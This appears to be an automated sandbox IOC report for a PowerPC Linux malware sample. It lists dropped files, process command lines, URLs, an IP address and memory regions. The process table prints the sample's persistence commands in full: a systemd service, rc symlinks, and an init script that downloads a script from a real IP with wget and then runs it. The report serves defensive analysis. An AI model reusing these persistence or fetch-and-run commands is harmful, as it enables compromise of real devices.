IOC Report
powerpc.nn.elf


Files

File Path | Type | Category | Malicious
powerpc.nn.elf | ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, stripped | initial sample | malicious
/etc/init.d/powerpc.nn.elf | POSIX shell script, ASCII text executable | dropped | malicious
/etc/init.d/system | POSIX shell script, ASCII text executable | dropped | malicious
/etc/profile | ASCII text | dropped | malicious
/etc/rc.local | POSIX shell script, ASCII text executable | dropped | malicious
/boot/bootcmd | ASCII text | dropped |
/etc/inittab | ASCII text | dropped |
/etc/motd | ASCII text | dropped |
/etc/systemd/system/custom.service | ASCII text | dropped |
/memfd:snapd-env-generator (deleted) | ASCII text | dropped |
/tmp/qemu-open.nxFfay (deleted) | data | dropped |

Processes

Path | Cmdline | Malicious
/tmp/powerpc.nn.elf | /tmp/powerpc.nn.elf |
/tmp/powerpc.nn.elf | - |
/bin/sh | sh -c "systemctl enable custom.service >/dev/null 2>&1" |
/bin/sh | - |
/usr/bin/systemctl | systemctl enable custom.service |
/tmp/powerpc.nn.elf | - |
/bin/sh | sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1" |
/bin/sh | - |
/usr/bin/chmod | chmod +x /etc/init.d/system |
/tmp/powerpc.nn.elf | - |
/bin/sh | sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1" |
/bin/sh | - |
/usr/bin/ln | ln -s /etc/init.d/system /etc/rcS.d/S99system |
/tmp/powerpc.nn.elf | - |
/bin/sh | sh -c "echo \"#!/bin/sh\n# /etc/init.d/powerpc.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting powerpc.nn.elf'\n /tmp/powerpc.nn.elf &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping powerpc.nn.elf'\n killall powerpc.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/powerpc.nn.elf" |
/tmp/powerpc.nn.elf | - |
/bin/sh | sh -c "chmod +x /etc/init.d/powerpc.nn.elf >/dev/null 2>&1" |
/bin/sh | - |
/usr/bin/chmod | chmod +x /etc/init.d/powerpc.nn.elf |
/tmp/powerpc.nn.elf | - |
/bin/sh | sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1" |
/bin/sh | - |
/usr/bin/mkdir | mkdir -p /etc/rc.d |
/tmp/powerpc.nn.elf | - |
/bin/sh | sh -c "ln -s /etc/init.d/powerpc.nn.elf /etc/rc.d/S99powerpc.nn.elf >/dev/null 2>&1" |
/bin/sh | - |
/usr/bin/ln | ln -s /etc/init.d/powerpc.nn.elf /etc/rc.d/S99powerpc.nn.elf |
/tmp/powerpc.nn.elf | - |
/tmp/powerpc.nn.elf | - |
/usr/lib/udisks2/udisksd | - |
/usr/sbin/dumpe2fs | dumpe2fs -h /dev/dm-0 |
/usr/lib/systemd/systemd | - |
/usr/lib/systemd/system-environment-generators/snapd-env-generator | /usr/lib/systemd/system-environment-generators/snapd-env-generator |
/usr/lib/udisks2/udisksd | - |
/usr/sbin/dumpe2fs | dumpe2fs -h /dev/dm-0 |
/usr/lib/udisks2/udisksd | - |
/usr/sbin/dumpe2fs | dumpe2fs -h /dev/dm-0 |

(27 further processes are not shown in this report.)

URLs

Name | IP | Malicious
http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s | unknown |
http://94.156.227.233/ | unknown |

IPs

IP | Domain | Country | Malicious
94.156.227.234 | unknown | Bulgaria |

Memdumps

Base Address | Regiontype | Protect | Malicious
7f3150016000 | | page execute read | malicious
7f324771d000 | | page read and write |
55d5c9c33000 | | page execute read |
7f3246896000 | | page read and write |
7f315002c000 | | page read and write |
7f3247099000 | | page read and write |
7f3240000000 | | page read and write |
7f3247bde000 | | page read and write |
55d5c9ebe000 | | page read and write |
55d5cbebc000 | | page execute and read and write |
55d5c9eb6000 | | page read and write |
7f32476f8000 | | page read and write |
7ffddfcdf000 | | page read and write |
7f3247b91000 | | page read and write |
55d5cbed2000 | | page read and write |
7f3247a68000 | | page read and write |
55d5cd5fa000 | | page read and write |
7f3247336000 | | page read and write |
7f3240021000 | | page read and write |
7ffddfddf000 | | page execute read |
7f3150027000 | | page read and write |
7f3247b99000 | | page read and write |
7f32470a7000 | | page read and write |

(13 further memdumps are not shown in this report.)